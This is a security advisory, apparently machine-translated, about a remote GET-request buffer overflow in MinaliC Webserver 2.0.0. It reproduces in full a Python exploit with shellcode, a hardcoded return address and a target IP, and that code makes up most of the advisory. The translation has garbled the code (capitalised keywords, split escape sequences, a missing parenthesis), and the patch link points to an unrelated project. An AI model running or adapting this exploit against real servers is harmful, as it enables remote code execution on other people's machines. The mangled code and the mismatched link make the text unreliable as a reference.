Release date:
Updated on: 2013-04-17
Affected Systems:
Sourceforge MinaliC 2.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59056
MinaliC Webserver is a small multi-threaded network server on Windows developed in C language.
MinaliC 2.0.0 can trigger a remote buffer overflow vulnerability when processing GET requests. Attackers can exploit this vulnerability to execute arbitrary code in the application context.
<* Source: superkojiman
Link: http://www.exploit-db.com/exploits/24958/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/env python
# Exploit Title: MinaliC Webserver buffer overflow
# Date: 12 Apr 2013
# Exploit Author: superkojiman-http://www.techorganic.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP2, English
#
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# Request.
#
Import socket
Import struct
#74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/
Shellcode = (
"\ X31 \ xd2 \ x52 \ x68 \ x63 \ x61 \ x6c \ x63 \ x89 \ xe6 \ x52 \ x56 \ x64 \ x8b \ x72" +
"\ X30 \ x8b \ x76 \ x0c \ x8b \ x76 \ x0c \ xad \ x8b \ x30 \ x8b \ x7e \ x18 \ x8b \ x5f" +
"\ X3c \ x8b \ x5c \ x1f \ x78 \ x8b \ x74 \ x1f \ x20 \ x01 \ xfe \ x8b \ x4c \ x1f \ x24" +
"\ X01 \ xf9 \ x0f \ xb7 \ x2c \ x51 \ x42 \ xad \ x81 \ x3c \ x07 \ x57 \ x69 \ x6e \ x45" +
"\ X75 \ xf1 \ x8b \ x74 \ x1f \ x1c \ x01 \ xfe \ x03 \ x3c \ xae \ xff \ xd7 \ xcc"
)
# EIP at offset 245 when minalic.exe is in C: \ minalic \ bin
# EBX points directly to the "Host:" value, so we put our shellcode there.
# Jmp ebx @ 0x7C955B47, NTDLL. DLL, Windows XP Pro SP2 English
Junk = "\ x41" * 245
Ret = struct. pack ("<I", 0x7C955B47)
Host = "\ x90" * 30 + shellcode + "\ x90" * 31
Buf = "GET/" + junk + ret + "HTTP/1.1 \ r \ n" + "Host:" + host + "\ r \ n"
Print "[+] sending buffer size", len (buf)
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect ("192.168.37.132", 8080 ))
S. send (buf)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://mod-security.svn.sourceforge.net